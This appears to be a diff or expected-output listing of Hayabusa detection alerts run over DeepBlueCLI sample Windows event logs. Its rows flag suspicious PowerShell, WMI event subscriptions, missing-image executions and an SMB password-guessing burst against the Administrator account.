+2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 18:53:55.378 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-02 23:10:46.008 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:45:14.660 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:45:14.661 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:45:14.661 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:45:42.333 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:46:17.504 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:46:53.627 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:47:29.168 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:48:26.011 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:48:49.187 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:49:58.603 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:51:06.219 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:51:13.833 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:51:25.086 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:51:39.538 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:52:37.050 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:53:24.700 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-03 23:53:57.790 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-20 01:34:31.100 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,informational,Logon Failure - Username does not exist,User: JcDfcZTc  :  Type: 3  :  Workstation: 6hgtmVlrrFuWtO65  :  IP Address: 192.168.198.149  :  SubStatus: 0xc0000064  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gC4ymsKbxVGScMgY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.513 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,-
+2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f2q1tdAUlxHGfGH6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3EPNzcwy7tOAADWx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AbwsMP10Rs4h1Wl1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EEcdqcpqsxQ4RgPx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ngdtRwzXXhAlRxGY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BbCFZw5qQgU7rQ9W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SXr7lA3MkV6xK36f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tVFs1kR0AuOutnuI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PkeEabFrDLsBVcXi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GH7dTevmTKZo46Tq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l2E8JmrfaCj5AjSF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N4FLUvawWPVqdLaD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KN0EeUzxSZy5l7J4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
